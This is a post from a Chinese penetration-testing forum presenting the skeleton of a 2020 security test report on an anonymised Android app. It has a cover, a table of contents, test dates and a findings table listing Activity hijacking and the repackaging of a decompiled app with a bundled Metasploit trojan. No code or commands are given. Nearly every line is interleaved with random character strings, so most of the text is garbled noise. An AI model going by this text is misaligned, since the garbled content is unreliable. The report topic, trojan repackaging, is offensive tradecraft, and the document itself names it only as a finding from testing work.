找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4348|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
% m8 f' j+ x" J) p; Y7 E 0 H% G( Q ^" w& h: |: F2 }+ _

1 Q$ a- G5 @5 }% j$ v& b# T h & b5 T+ ]! P% N8 i1 o! N
7 R5 L' O% ]# y' s$ N& p 2 I' i2 `* d3 p. T% Z

3 i' W( ~+ i2 z5 }. ]- T5 J9 r* _# \1 e1 |
3 G5 g1 x- A9 r8 r3 ]9 \3 m1 f . }: H) g6 Z( y4 Q

8 Y6 B# k# I u! _! h . @9 r, t) ^0 g/ Q: `3 H" C 文档编号:                3 L) f: j! b6 m! e: U + @5 L1 `( V2 j; Y- m: V

4 M* o* V5 k: A' h , f. e- q! t; K4 k6 ]1 `2 y

6 ~4 [( G0 A# K* {3 B: _ . r. p* @2 d6 j/ I" \   ; Y( R) J& W6 U: R; w/ o9 \* m7 B+ D' p2 x# d( n1 R( K5 h

3 E, y5 M; j8 ?- g1 r& W! L. m2 P' v8 G- l# U/ V; G

5 C. |8 ]' U( `3 W) @ ) @* C9 C+ i; s   - B% N- F Q8 S$ A1 J8 C* z+ L

; {. X2 S2 j$ m* N! r9 m - S( C2 ^: a1 Q ?5 w# H- ]/ ~

/ f3 T1 } M; f L / u( C% a' J% L0 q: ?- J" u7 f   8 M# O. N' \. Y9 N6 d" Z! o - P5 q( ^ H* P/ C5 H7 E0 Y" H

( X4 V+ C% f+ v0 {" v! V" }8 o; T1 ?1 _

. `1 }" d& \" Q1 E9 b6 i 2 ^- l+ o' R4 K' o Y+ x! W   7 H! D! Z6 l6 q" M# C. F5 i) ~ . @4 Z% U5 K( T9 y- ^

: F3 s! b/ }$ T# o$ \ 4 }9 P6 Y# [; B- s* T! @

2 E& J5 T( k6 u* l. V" M5 e7 |# _3 [! g1 X) |3 Q' k   p V% B0 w% V/ p5 y* `1 d m$ Y2 [/ J4 s5 r

: @) i S% {5 I2 S 5 b% x" S4 Q1 e

" J3 P0 R) w+ k* d5 x2 r- o( V 3 B) Z/ H6 z5 Q5 P2 I 某某某APP渗透测试 ' Y$ O, ~$ u1 D1 g6 f) t i; z8 G7 W

0 j8 i$ T6 A( d3 N0 t* y 8 ]* s( A* T8 d6 F9 w1 P! g' m

! E& a% \4 V! e3 u: R! q ) C( ~5 j [) _9 i4 z0 [6 M5 P0 v   1 J4 q+ j& E& w0 X5 ^7 {* z+ g

' J% M8 H' u' k, z ; E; K0 g* X4 y- Y5 @9 W. G; {

9 V5 A: |; D7 b* d# d0 |+ |! r, A 3 q; [) L3 J1 H9 A( _- m   3 c5 P1 q4 |9 C9 W! `( n / g5 P# w9 \+ Z2 R, m

" O2 G( j; Q) B# v , `' ^3 U2 `$ l( M, T* P

) m* g- q. c4 _3 z# ]: c. i2 \/ \! k* ?# W& p+ B9 w" ]   & }8 l; K& K* c9 N) ?$ W7 U/ }& B) H& S& `' _5 R7 R

1 ]2 k) Q6 u+ ^0 h: o# C 3 o* E) m0 {- _ @. v8 i9 w

e% Q! l1 ^0 ]. n z8 _8 o $ j" X. {' {) z, C3 ?1 T: }( \% F   + T( E" p* X3 C M$ q9 \ 7 D, x, S. Z2 Y3 R/ K

5 U. C* p* l3 ~5 d, P6 n2 |) @ , A$ Z) x* c- D4 R ?1 k4 Z

3 d( t/ q! J L 7 v8 d1 T9 t$ u+ A0 G4 W+ t 技 术 报 告 2 Q2 F4 |- F: R" y8 t/ s: z) N2 n9 { S1 a7 @5 N

; _7 _' {, y7 S. s6 l, c5 O d9 z9 O2 e. C* S

8 e3 {' M% G. W$ x( J. T8 x ( R+ [( a+ }9 C9 Y# l% y3 O   }! u5 O, f. A, z B 9 L D5 E7 w) |2 U6 ]1 r$ z+ k

4 ^9 `2 A. O v& i! | ( k: O9 ?: i3 R+ J/ J

# h, [+ |2 q& D/ Q4 X1 p3 E* V) s1 I9 f# h5 _- h6 O* k0 P   1 J. E9 Z; ]- G- N2 u$ ^1 E% a5 Y( i. J5 @! I1 \4 ?

; F/ q+ i3 T T, A& v- ^3 m3 S 3 s2 M. t0 @. }; T z. D) k2 i/ t

8 Z. ?- ~& i3 ~- R/ @. D9 E9 \9 x4 V: l1 F1 g   3 ?. g5 R9 w$ T, \, e- k; ` 8 i! x# [. V, Q% M6 H% a! P

4 Y% m; I- j* u4 u / u8 w( i# X4 u0 A) e& N

2 l4 v) @4 w- r+ }5 f0 {2 A1 S) {4 o5 @   % `, t& q. a8 F1 V5 l 3 v! B. f; ]: \, C7 f( k

5 F* t$ i/ r+ q8 f6 h' n - @2 w `$ M% R. j o

1 Q9 w; K* l- q$ ?3 t" a 6 M- r. ?& \5 n   ' D9 y* }/ c* l - E$ Z' C9 t/ u$ [

8 m( b% F- q5 L# |: E% M5 G2 n5 J( q! F* d) p/ M5 H: B

6 C! c5 U& i, G # w* }' m: K) S6 N! R   ! _( i( _7 ]! K9 j+ \1 S# w1 y+ ?3 r 6 ~! I5 h. q. A& J# d

& c; `' B( j: E3 Y/ M* Y' u 9 u3 X: y. j& H5 z

" Q# |* d5 c( g5 J. e+ s " b7 ^. {# i' L J5 A5 M   6 I9 Z. j6 X! U! s" C1 B0 b2 l0 B 4 o G D8 }* r' ]5 s" D6 M

5 J- l+ O4 y' B ! J- l& J1 R( Y2 F1 Z& ~+ h

9 u/ m5 {9 r" d9 A( b 1 ?2 w* e5 g- s8 C4 p   % n3 M _6 H5 J: c* p; f . r$ T; }: L. z3 S% K! L* O2 i

7 K! R' D) y& `! H" _! [ ' o. ~, g# f0 F# C

' ^7 s3 v" P' E3 E, D( j2 Z % T) V- |: q0 e$ {   ; `& Y8 C5 W, y5 ~8 F/ _. E2 V$ ?9 @6 V

9 ]$ f, F0 p8 ?6 z& J5 _ , Z- @2 d9 G% c( t

9 s$ J7 f2 Q2 N/ f2 T' u% H ) z7 J; y$ M6 |4 O   1 n. I% J, ~3 Y+ {" C$ C- a 4 _" t; J- S2 g5 C: G

3 S* L: _0 v) ^' N: M) G ' N9 i: Y+ a8 y- t8 Y3 ?4 k$ _

; r" |6 ~* h2 { , d9 A l/ P. q, x   0 X9 Y# j; f1 u( f2 g4 p: I. q - B- M, g. y: d. v& o: ^1 S

: k2 ]; \6 N+ u/ k6 e- W! R 7 f: H; X, K/ t% R" p, @; Y* }

/ _' T! ?+ c# ~: h( ^" r + y: Y5 X$ E) Z4 h9 p   9 U k5 T" T: e6 z: M$ n+ e% _ 3 h' Y9 a, e$ K% H9 u

( d3 P1 a' A8 |% n+ b; k3 ^! B+ F3 V* E: U& c- _% h3 A! ~) w; y) p

( g _! d: {+ {( B % H& U7 |" S* y/ U   ' r' |6 `% a9 E# J$ U% Y ! B( X' V, Y, q0 T

" h! q7 S" a7 T5 A7 K " z- a6 e$ ^/ Q* X! R8 [

9 J9 U8 p. C2 m B ' d/ ~0 o& E# V5 A/ W/ ]   . U+ y' D. p- {/ z' q; X: |0 x1 V! m0 q

9 h; k7 ~) V. _# D; u' y g' a/ f4 D' c) `2 S" }8 ]. k5 w

/ U! ? ^8 C( H. Y9 }6 |, s$ N y& I1 n0 C, w3 v4 N/ C   6 l' m0 Q2 q0 P* J+ x ) j! g; f- m8 n! @

, u) G! X3 Q8 Y( i! A A % S) p5 w, T* z: W. K

; f( B& ?: e, @: ^ G ( ?; |" _0 r$ R8 O4 h5 F$ w/ o   ( Y. Q6 f6 z; A/ z5 Z$ V/ K8 W% F7 r: o" F

s0 D& N' z! x 9 ~0 r% Y3 Y6 b: g. |$ V

9 A7 e9 Z/ ]! c/ h+ b3 u0 N 0 x. b( T0 Z. E3 o1 k   " O, H' q$ P: J+ ~( y 4 a: b* n7 Q; J8 u5 |

1 f5 C" S4 K& O" R) G9 t5 y) L3 y ) Q! F' J/ u2 o: `. ~( j

9 B+ |9 _) f, x6 R, L ( b" l* i; s* }( R& m   `% ]) J% l; P& \7 \ * j+ Q1 y$ E5 U, c$ @

1 |6 Z% N, |9 G7 @ - ~7 P3 K( p) D% V- G

4 n2 W) L# O. B1 O( n, J/ h" M; e. U; A 二〇二〇年 9 l2 H. ?: g: ]% d& Q6 Y . i0 {/ y2 ^3 G( l- W5 m* S+ l

- _3 d" c: ]7 j8 t4 D $ [, F) y! I; [: l- P. A7 J9 Q: e
/ t Q9 J' J/ z) A( K& C# S0 D9 B1 x! P
. p. ~; z* z, j: V. D8 Y# F - l! c: \* T; q) @9 B 3 S" ], h$ e q G# |8 W; R# e, g; W4 G4 v) u( }" z
& }; p/ `5 a. g , B, m. f2 b" @5 I3 J
+ B, C. o( e7 }, ? ) [* l5 S, I7 J, T
1 _3 j7 j1 b, A; F4 k: L* q* u, c! i2 W % K e1 S! e7 {% M( M . C% F& i, S" I0 r7 ^7 t8 b! @
" P* O! P4 N V- g* r5 I& N 1 l4 o( ~5 ]3 k: k

& e$ U! d \: ] 6 Y7 A% E6 v1 d ?5 D 目 录 0 ]# I! e ^, E9 y3 _+ a& { ! ]7 H3 N% n$ A9 Q! _/ a9 j

( R! I* g& z, R" \/ `. |4 T! N# L8 k4 b# w- e7 J 4 W+ Z6 y# O/ }: T 4 i _) j$ O f6 V

' ?: c6 V$ O6 _1 j ( ]$ X( I3 j, W$ p* ]# i7 Y   ) B) _! V/ d" R* A; G" R ; f% q4 K) L& S& Y" v

! d% G- e3 t2 \& B* o" Z0 x- v e8 P5 x6 q* D

7 _# A. R4 j+ f0 `6 H3 |, \* h* F+ e7 G# D 1 概述... 3 4 O) w3 w8 y6 Y% f& \. S X0 Q! P- N* J+ X, `8 }$ J& U2 s

' A0 y- F" A& ^+ b0 T8 z! { , Z9 E* h1 R$ B2 Z) |

: K. R7 a3 X: E3 N- A) ~5 ^" w " m0 O& i* x* k) x+ n: i 1.2测试时间... 3 , {! E* l! H3 L/ I 3 j. X' B1 D% x; y& J: H

! F; [- h2 W& F4 f! ?5 H K' n# H/ H+ t) ~* `

& k1 S5 ]! V U1 [( E1 P2 W + O/ ^7 k+ E& t z, O 1.3测试对象... 3 ; t1 M x9 U) w2 z 8 r4 Q( D; ^* \8 y; I& Y0 S

" P2 Q. {7 ]" }, `" ?( j$ h" y+ G) X# q9 e9 S

8 ?" d' c. _& {* P6 R* s 7 v1 V2 ~) y7 }2 ?$ k# _9 j( V 1.4测试结果... 3 ' C. I/ U$ M4 m2 h- k / Z* a D% v% A u- Q8 _# q

7 o- F, X; z c. l: {3 X q& R& M4 B% m$ ]1 u `- h$ a

7 k( z6 J# A' @& {$ q# r# N + o* O3 I% w" P. q! Y' ^ 2 检测结果... 4 2 i+ Q8 c1 c- j# A' B' z }: F: T) ~4 I/ Y6 ~6 H" I5 D

* P% a+ V; c8 O9 u" ]# J. J+ M4 j 0 e3 h$ L6 g0 F3 \

# J- J i. H: K2 m/ T . X0 y2 ?- p$ b' c6 H' Q, B 2.1 某某某... 4 5 y8 c% t& }6 d. ?1 D 5 v5 n. B# a4 _6 s" d5 Z' b$ J

# x# V- b3 u3 o+ v9 y* h* v; W* ~6 Z/ i5 j; I8 v' p

, q) z+ V% L, h/ c % g7 Q0 `+ L/ ^6 G$ V4 t 2.1.1检测目标... 4 9 `4 L( P- w4 f' ?' J5 a5 D, k / W9 W2 P) S# z

5 x/ G G' _# B $ w+ I; Z4 E" m1 T' x

, \; P! G5 D9 U) o. P % x0 A' n! y, g% ~/ m 2.1.2检测结果... 4 6 }% T; K; |8 v1 U+ x; q7 E' I3 E3 B8 A4 h& m6 G" {

0 _* }: q4 T$ q; E3 @' c/ B# y6 ^1 I+ C( K# B/ W& I- R# c, W

8 B: m( X! f# B# @# c/ M* U, J/ N" U1 s% \/ \ 2.1.2.1. 4 & C" P$ {: k+ i% p" s# u2 v! o! o : h1 j% e% s/ P7 e. i

, D' D5 f' |! ]! C% t Q2 ^$ U `% B

+ @, X8 ?6 L1 d8 O 4 N1 u& m6 N _ 2.1.2.2. 6 ]3 b8 F+ Q$ X( A% B6 q 1 q. S0 F( Z6 v7 h( `1 t- e& p

8 X( @7 @ J% ~0 p7 @9 ^% { w! U 2 d* p" N% E; { }

. {! R% _+ W0 C* Y* R- g& }* l0 j ) @0 X/ s- ~7 ?" N& ^& x 8 ?. @4 l: l" l8 c! F - D# z/ G. o3 f; W0 j

6 I( Z" b& A' z, r7 G1 } $ x6 K1 l: n4 \, i9 P# o: c ; H7 t: y9 _7 Y8 \& M & q8 ^7 \9 |( z( \; G* {0 e' q. M
0 h8 S* N" P1 ~% @5 e/ j2 Y L) u6 N5 C3 W& k. W7 I1 ]
( X: k4 I. y' V# R. X. q& X7 y% @' R# y9 N! s# o8 s 6 n2 g- i1 k& B& e) j! M 2 _( ]+ V. @ x* `. p

* d4 p: D) `) Q2 i/ _6 |% t3 U; J ]. I- O 1 概述 7 j+ z7 V9 p& h5 P4 u 6 p: ]5 q! Y1 G- D% J1 y( h

1 x2 J0 c, K2 f- W; K & [1 ^9 N7 F! p1 g& j4 l9 W

' I! T: L+ `; O: u7 o' o " x1 K/ `( C8 C) R a 1.2测试时间 / R/ A5 ?' z1 D 9 t+ l+ Q) k, E" r& W& L f6 O7 {

* B' h) _3 \# I! X - o9 W5 K1 D5 q V: M2 e5 ]8 | p. P' x' [, D i6 c- G8 A1 S, \6 o2 b4 S. K. W& V6 v/ u2 X, ~5 M$ r( M, x/ L( W% k7 k2 m) U1 `3 ]0 L+ E3 ~2 k: c7 [% U# h0 j8 X+ U: {( Z7 y' G/ F1 R; q- F9 H% t' x9 ?) a+ B/ p: a! R5 E5 w3 f! a G8 }: P) y K6 ?7 \8 A, h2 c# J9 \0 F' M) G" b" E( j5 k0 E3 ^' _. i+ G7 _! W, u. ]- s% Z8 W8 Y3 _/ t6 @( \: ]) b* n( x4 b8 j0 P3 ?7 f/ B4 r3 f( g$ h9 r8 J; o+ ~0 C$ ~/ l6 F( n6 O8 S+ B4 Y9 J, E u v* T" \. K3 o! n8 t4 V3 `, \$ O; C6 ?! j. x, C$ Z- }" V5 L$ U# O2 h8 ?0 T# ~+ L1 {, Z L0 |. u& l' H# { }& F. I5 H) W, X2 z' u! Y+ X! d' T: u& v, l3 k1 Z+ _1 ?3 w, L4 Y5 k. U7 ] e% b' H9 \% w |" K6 Q; N" e+ U6 D$ `- ]; m; T. N3 U+ s; S9 z8 L$ w. |( P4 {, _1 j* A8 j3 e5 j$ S/ r X) A- D6 O
! b0 W( s& Y( x- k- `7 X8 U8 }+ p6 d7 e5 A) T; S' r

& f4 u/ }) [; g9 U, | 4 H. `% v# a( ` 渗透测试时间 - R4 ]" v- s0 x( X & c- w, H6 z7 S6 J5 Y, L3 B

! Y9 V3 y# J8 K `' `& X D; F ; b2 x5 T: d' t/ q( f& L0 f
2 s4 j, y- r8 Z$ _: B3 e. M4 d 3 K; F6 T& _+ N: p0 e' w' B

$ s# z! @7 X/ n2 _0 Q5 g) p" O0 C5 \& |3 r2 ^ 起始时间 2 O) h* i2 X0 f( I1 b 9 M3 C( k$ A6 ^# y) J: Y

4 }5 V$ c; ^; u. i) ~& r9 H ' S; Z# w$ o$ q/ H/ z( M r0 _ 		- h9 Z7 w; i. L* a1 ^; N- J J$ x) |9 e3 t% E! t

% Q" G* I p& g% b- ?. \1 @ o % C9 ?( n; K2 _9 f 202046 ) z. e- L& n! A; }1 d# i . B' k6 @6 i! R' ^3 V8 q: c

3 A$ F" D- P4 S8 L# x6 r# W* u5 [ ; e$ p6 ^: J- C; t z+ d' o
/ @7 Z5 h# Q/ D9 H" m + c* Q5 x* m5 ]

+ C% l4 g0 _* F ! G, J& V# L7 M7 L( n( ^5 \% S 结束时间 $ M& S/ y' X6 E! M/ V; z! s- c T# c4 w9 [) ]4 X, c2 I9 [

, e8 n7 n9 S F1 |+ x6 p$ o: Y9 X9 _+ m) [3 R 		, n9 U( h. T0 b3 e! w5 r1 ? . o& r1 n' |6 v: L

" I! D. ^* { N ( b9 h% n. s, m1 r5 {& d+ c 202049 3 B' \& q! D, l1 G+ O3 h2 a9 Y4 E- h

\% Z% ^ j. F 0 a7 W( B. B; A R
6 P8 R( I6 t8 W# p; R# C6 t9 P# ?$ O ~- ?8 B

) i& i" B8 J- {9 i8 \: K, Z3 r# R' R : U4 E* T+ m( y! e- c# O; G; f1 N 1.3测试对象 ( i# M! [6 W+ f4 D5 [! Z / M; E- ^! Y! W! n: X* p

, B6 c, B4 p+ ?4 K & Q# p6 T4 Y6 B/ S% W/ }+ c

" \, c+ D& E' r W5 \: c1 A8 y- d 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ; r7 F2 F5 B1 ^ % C3 E3 \& A# W2 y. X

; u1 k" W* W% c0 L) ^" O+ ]* `: P K1 Z8 E- G% @8 C

3 u9 v7 o' }6 H8 E; M* t$ @$ o* r$ J7 T6 U A9 p 1-1 检测对象 9 q; o. I4 }; P6 Z0 K! W, n3 F7 ]2 ]9 k' C- g! B4 B

' o0 B, n! |* B' {' [9 H , V+ F4 Q E) Y. G. G * B1 ?+ Z$ `+ f( D4 W& y! S% P7 W/ T- J( |) r( P; v; d& T, ~# r6 F/ M# a# K! a% v9 |7 P# g4 O" `! J0 y6 E i# d# Z: U3 T1 [" s& ]! X" i4 N5 i) ?( k6 Q4 s0 H: Z8 t8 H& K7 R( j! a7 x2 w1 U) W* a/ S+ F# ]+ A( ^; r5 l2 Z% ^. V i% X. ^4 f" b0 e1 Y( w$ l7 v% ^* z6 K# J- @$ \4 l8 O+ r+ _# ?8 S/ _1 J9 o1 o8 h6 B5 v) X7 z/ y# X0 d; ` S% a4 {% l/ m- ^9 T! K, T" Q7 F$ M/ Y) j1 V# C% Y! a: U ^4 p, B0 o6 X! B1 s4 x5 R" q0 C. s( {6 z1 P6 S1 Z0 `- G( d* {$ i5 A. R, n; J+ Y, D% s) S, w* A, C, T( u9 D- g) M% a2 L8 Q+ d5 Q) ^6 r6 b) o) K* O7 g# G* H) ^2 F6 }1 Q( n' K3 b1 Y; _3 V/ e) g4 b3 ]' N( j" f6 _! t9 ]' A) ? d9 N) U; t; ~- S6 Q# }% g/ [ t- g6 H- E" ?& `- X6 Q0 \" Y- q! a/ X- v$ p$ ~4 l' H9 q- l" W# J8 c$ I
: [: v% |5 N- z4 k4 y7 t# V* o; ~2 a! i3 ^( E" X, ~1 |6 k

, R0 }; v) T0 I. { ( A7 [6 @1 {; c7 H0 r& K: ` 序号 S6 S% l" l3 H" z, ]- a" \! C3 E! ?/ a" a" ]7 }7 L9 t1 `! I

. e/ a: O, C3 J+ e- D* ~3 W% g& W# c, V8 W5 Z7 N 		" @ E+ w5 Z# b5 C4 K( n% @ S ! t/ ^, C# g" y0 M8 E# U

% _6 S3 G4 _2 A5 I% K! L, c Z! c6 E; Q2 v8 }, O 测试对象 % Q+ F# b- [& W# y3 J - ^: y0 U; Q ]1 U) h( Z8 U/ n2 R+ x

, v# z1 Z$ `. Y4 k7 b & p; L$ }/ R/ z% U+ E" B% S 		7 j* N4 \: D/ Y$ O 2 }$ `7 Q7 d% ]0 J5 c, ]+ W; I3 w1 }

$ |+ c$ H. e% P, T9 |5 O ; g1 F7 o# J* Y* V( d 测试地址 & n2 K% v& l/ \8 }3 g `6 Q6 y$ }& ?* X

: K+ b% h& B1 q+ w3 \/ c2 r# Z ! J* d1 \5 e# y4 Y$ x1 M4 J 		/ B5 F) e7 P/ G$ w2 F. A3 Z! G

+ H1 r: }; F5 h! ~1 y$ n7 B8 \8 w6 Y+ z7 F2 f& L 安全漏洞 ; { S+ P/ Q: a; b* V 9 C$ c# y1 T; c

8 B3 P, {! M/ @9 S/ y, t( z 3 v1 B& t9 i! N, I% p6 P3 X% K
9 K0 s4 o- {# d: F+ Q 3 a- l* h# ~- E! O N5 m- c9 S) x+ A

. F8 ?& l8 ?+ s J0 F2 S 5 n' @. y# w5 Z' R% P9 [# _8 t4 U 1 1 t3 g1 N% D3 _# F 5 w9 t' Z7 f {2 \& ^

5 h; k+ H3 o) F: A) r3 O& D $ B g' a1 v$ _' p 		- z( t8 _8 [ Z6 L9 {) h6 n: i; Z0 a9 ]8 [

3 x) _( Y& n2 V$ Q / l2 ?3 r, X9 G' k# X 某某某安卓APP 0 v/ y9 Y3 A: g3 p/ \) b7 \: V/ r$ {$ C) G0 ~. y7 P7 M$ ]

0 b m' Y$ ?& {" }5 Y" d $ Z6 B X# w5 a 		+ [7 V, W4 n& s( u8 ] $ ^ i. B$ e4 ?4 j4 g

8 u. _/ |' t! m8 U1 [0 N8 L . ]- l' B9 f( E% S8 z: O" h* f   , B8 i1 ~' Y; N# u ! k2 ?$ t4 ?4 D* U: O' l# y* ] P& L

6 k5 ?# m- w4 N! u - B5 X% f& L' ~" [/ G$ q( B 		% e/ Z$ k& N, r7 W0 Z$ z/ F. o2 g* P1 Q

- _' d3 n# n# L0 ~# m ( z |& G! Q- a7 [! x& a 2 6 ?7 Q$ M4 B8 P, \ ) c4 P" \8 f, f" _

' P0 O- |& ]8 @; Y' |& W7 S7 }: l4 `
: o( X r5 O. ]5 K3 |6 g& f1 s$ { B8 X5 T

5 Q) j* I$ D1 S- f7 l4 R1 q : P5 M' z1 M0 S% C; q 1.4测试结果 - e0 H) w6 L+ a' n. Y/ V" y* g 5 U A' F* m# t' S

7 U% _9 O- J8 F6 d( x7 f" t5 h3 ^0 @! b; A! J# M/ Y5 u

8 S, ?3 o' }2 J% M3 v/ }5 i* Q, s7 e ^7 z; n 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 0 n9 y, h. B2 A& W+ y/ p+ R& w; ^8 I2 g. o( W

/ V2 b) o. c- z8 h $ H4 X @9 a& u! j

2 n, S, O2 c2 g 1 r# K6 D+ V* B1 N. w* Z   7 [- _* Q& [3 F. A1 ~4 u( H) S) Y! }0 `8 a1 |

- f- ]$ \: }9 ?' N! j6 U 8 o g; q# | U( b
4 p8 e9 z( D) \9 p3 N4 g- [7 O- L5 | ' u' D' F2 W& B$ |' l, O3 q; d/ B& v; [; u' S, q: y N# `, ^2 W. | @$ C: A* Z- w7 k8 }/ e7 K) P e8 m2 d7 `0 a3 L8 F& o- }1 m( ~# Y# }3 [ u2 y+ J" O. f4 `2 e) I! T- W k1 ?3 w1 \ Z* Q/ t# B+ Z G( B+ t! d5 j3 j9 a4 L; l$ L* _, J; B+ x/ r# K3 m! |1 [( m# b R& k# Y- X& ~' _7 A9 S. F9 C* O# o6 Z2 {( U4 I0 n% N3 Q9 X6 t; ]- x0 V- Y/ [3 N/ w C% i& B; m8 o+ f5 A8 K& W: G8 G# m! r; `, L3 |. q6 e, ?2 i: t5 M$ c' k1 g, l. U- M7 z/ j! V. f4 p" T0 n4 {, X3 Y! m7 h: L! M8 N( M' O1 W% D9 ]; { E9 o1 S7 V! e h& l5 A; B1 Z3 ]% k, A) E8 f: Z+ w z# a% c+ ^& R9 A8 ^$ r! u( J: `6 X; o0 Y$ O/ i4 D. f a; I/ v2 V; p- m1 n5 _( N) v; c/ @ k5 o% b+ c e! p. a) G+ n u, ~( Q% ]) w0 e4 b; \( [. \# |- J* z# C e6 G6 `# h" V! }6 f, u6 u! [1 E$ M$ W- s5 ]6 t1 ^* j3 {# l( t9 K* i: K" p* N' N3 S$ Q6 P) }0 J; Z. T( l: o6 X+ i8 `* [: l% h3 D% [4 S. n7 B; O, U$ n* E- T$ P8 R: I% f' x( x# m3 D0 w% a6 ^1 O( Z# i! l5 X d/ I6 Z U( I9 p8 P, J4 [, w% K* M% }# w# u, o3 z9 m ]1 v% j. x2 I( n" X( z& H) i1 q y1 A+ @5 M( H' e) G: {# z5 f6 d K- j. k, r9 H, F: G9 ^- u. q) D$ C
+ e/ ^, q* l S" o$ P) c) { $ X# u. G U3 W% Q6 X1 l

& f# \5 z/ z# i, y6 S" g; K* _& i; w 序号 9 c3 N2 N' \5 @, [* w8 O6 v* N* C; H3 z& X

. E2 _+ Z) U4 `* _# A8 ?! t/ S- R8 x. U8 \, S6 V5 _' E$ Y 		) Z, B7 f" r& n. r8 u; S; I* v. N* w # A8 R( t& c, w; o8 Y

% w; |. C0 [7 r& V( k- q+ Z' e , M- N; I6 v* S. M9 n+ b 系统名称 0 P `6 s* m' {, n4 B. J # K$ f. T: Q4 n q$ u

$ M" \& o. H5 H 6 N, J4 n% A2 k$ W5 A7 d5 F 		1 ^$ V2 \) C) E/ O , f% D0 F' V" J1 h! H3 R4 `

+ s! Y6 d# @2 [5 [; }( y8 B , D" ~& C9 e# Z; c 漏洞名称 $ I) M0 ~# y4 f n* r6 h ( O6 n! b g9 m7 @, f- j

' P! [2 H$ l8 n: N. K% k & B8 P, f; h2 r/ P1 X6 P9 { 		$ z1 } Z5 V& T' z* v: V $ X. f7 O4 |! f- K+ e+ s9 S

/ [# q; H5 H2 Z2 v9 \) H; N m2 U# a% d 漏洞危害 2 D w" l% M- M3 A, |4 U: s; z1 Y ' H1 x3 e4 B" U+ K3 F7 g3 P- H6 Z2 [

! \( p% l* A( v8 Q3 L9 r; l 9 f, h, i. N; E# [4 z d# C 		. j( r4 t e" b9 | ( |9 P e; ~& o- }* J8 Z/ j9 H; E

* j) Z6 k9 Q/ [. @& U! V+ {, ^, u4 H / q, H; Y. g9 O) K 修复结果 ; d' m! `. g1 K: ~! Q 3 m- {$ }0 O5 j+ i* s( y7 A

6 F6 O; F0 Q/ K" g 0 A1 D6 y8 }9 i5 I) v4 m F0 v
$ Z5 C/ C: ?2 T6 D' |3 F, K ; d) o$ L+ q, e F: T9 q

& D! |' v: o9 ]) K5 u d5 Z0 u/ z: Q8 m7 z 1 3 Z: ~: {+ h. P, s4 a, i$ F s6 g& i; L' y, T

7 J# v1 |- x. k0 S! ^7 y) _4 y . a/ m; K9 m* Z' o! C 		2 v. Z* ]8 Z: r+ q- j( J% H9 N; j" \! _

+ \: @/ h7 l6 n& C4 Y' [! p ! B" y, e7 Z/ n+ y4 Z/ k" K7 a5 P 某某某某某某APP 6 U6 d# }* e# E; S; X. z2 b # K( W e% J; Y$ d& q1 P% u F1 @$ | L

1 w8 ]6 h7 ]$ u. ~1 s# C# J9 E, ?3 X5 G4 @$ Z0 Q2 C! p 		9 }/ B8 k$ @1 h+ S# |: e8 K & s5 ?% O! K) E1 n. o

O+ E' k2 g& ^0 F , t& g+ y- S \( A Activity 劫持 % H. W* Y% |; b; m 8 s1 D. d1 y& M/ i$ ]" ^' L

|* Z- b2 C6 n' p) Q j 3 F0 D3 \$ _" x

/ Y% ?. x N' u/ I" Z/ _: p ) y5 F- q1 E) l   4 l% ^& r# i9 P" s: ~9 ] " B0 B2 g/ H4 d# g9 M

& l% _' K+ T& C; G* V; X( l2 ^2 e9 T/ d 		8 v9 a- b& ^7 U- C8 B) R7 N 5 B3 y, ?6 ]+ ~* {9 M, v" A

$ A8 g8 T0 H8 D 6 B6 h [/ y/ @8 x8 R. r $ g9 ?! A7 z; H- w! u5 H ) e; ~( E+ p3 D U. G+ r2 u

: H }" C/ i' |/ k- L/ K4 B( H % B. q3 ~# n% _" R% d0 J 		2 e9 P- a: r7 W5 [5 @) S& o L . I( e( W& C, U8 i. k1 |

( B5 t& I4 i- ^6 L! Y$ D4 m- ?: W * M* A W, H# a* `& ?- w   4 q# C5 ^. O" L) U, [5 t$ T$ \8 w( q- t 4 [+ n7 ]# h* j g. s( z. X. c

8 w7 ?8 I. Q" ], e n & z2 {# d4 m! ^
: k# H+ T+ C; H; Q- z: N' ?8 A4 E, h

9 C* C. @$ Q9 D2 {% O' \. f+ A% _$ B$ O4 u2 N9 N; c+ } 2 % I; g( G) P% d j* C8 `& E/ q1 |

3 l0 A/ M, h2 t% v1 g 3 ]; Y- E2 j$ i; n, i* {% o 		& e, o3 K2 q& t# K3 `& p5 g 1 t! ~) r2 O9 ?! A

^+ \7 q. H5 R% x6 t% W+ I7 Z3 J \, U$ m, O( o 某某某某某某APP + L* U0 p* Q# a) p4 _) S# i$ l: J2 J N

, n# i2 u. q) E3 Y* g8 q P- r' Q ( E$ r9 s; P& o9 d' |4 [; { 		: n4 v2 l. `. `9 r 9 u5 d5 ~- P9 C0 B- K, _; ]. Z+ ]' `

1 h( H! b8 @) s0 |8 j7 C2 k/ _& c" J0 S! ^ 反编译二次打包捆绑木马、篡改APP代码 $ J2 e$ E" N% j) E3 z ; V, v; g% U/ S2 q, }6 U: A9 P

/ }% {/ e- X9 P7 k' j1 [* A # i* \2 X" r. v j$ y5 E4 K& p3 A 		. ^ J- W. e- S7 N" C% B: m % ?' v- j/ e @! [" u

2 `5 t) J( j }3 ^& H3 [ , I# b; i2 c: p' \2 p0 d2 L * ~0 k# g0 ~7 N( c; E9 I% E 3 u* r4 C$ q1 N4 D

/ Y( U8 s7 V) V1 L n& A- x% J 2 R5 e( q9 E) ]7 T9 H. `7 h 		2 v3 l0 [$ B! Y 5 A- x3 o+ K# M

1 v0 y. Y9 G% k8 i8 x# m 1 U) z) W2 p5 ?   % Y* R/ b; n% H9 i: {2 e+ N! Y3 j+ b" Z2 q' ^( }

{3 n( g9 |5 J' P3 R7 L" T ! U9 I/ ?/ q4 r; k
5 Z4 p" H, r! y0 c5 ] : X% n0 D7 ^. Z) i# P# q" h
- w3 Y3 u5 o& H/ O 3 n6 Y7 M# V' ]; M& j4 b, n

